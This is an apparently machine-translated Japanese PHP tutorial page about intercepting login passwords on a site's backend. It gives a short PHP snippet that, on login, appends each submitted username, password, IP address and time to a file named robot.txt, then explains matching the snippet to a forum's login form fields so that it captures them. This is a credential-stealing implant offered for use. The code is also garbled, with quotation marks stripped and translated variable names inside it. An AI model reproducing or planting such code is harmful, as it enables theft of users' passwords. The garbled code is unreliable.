バックグラウンドログインパスワードをインターセプトするための PHP コード_PHP チュートリアル

if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定
$sb=user:.$_POST[ユーザー名].--passwd:.$_POST[パスワード].--ip:.$ HTTP_SERVER_VARS [REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // POSTで受け取った値を連結して変数$sbに代入します
fwrite(fopen(robot.txt,ab), $sb); } //結果はファイルに書き込まれます


以下は、Huaxia のログイン ページを例として挙げた簡単な分析です。 bbs.xxx.com/login.php を開き、右クリックしてソース コードを表示し、CTRL+F 検索アクションでログイン フォームを見つけます。

キーコードをコピーしただけです

アクションの後の値はフォームの送信です。たとえば、パスワードが正しいかどうかを判断する方法は POST であるため、$_POST を使用してそれを受け取ります。

。 。 。 。強力な省略記号。 。 。 。 。 。


アカウント(U):

class=input id=pwuser accessKey=u size=16
name =pwuser> //ユーザー名の入力ボックス。$_POST[username] に対応する必要があるので、Huaxia のパスワードを変更する必要があります。 $_POST[pwuser] へ


パスワード(P):
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> //ユーザー名の入力ボックスは、$_POST[username] に対応する必要があるので、 Huaxia のパスワードを $_POST[pwpwd] に変更する必要がある

http://www.bkjia.com/PHPjc/325278.htmlwww.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/325278.html技術記事 if($_POST[loginsubmit]!=){ //ログインボタンがクリックされたかどうかを判定$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS [ REMOTE_ADDR ].--.date(Y-m-d H:i:s).rn //...

;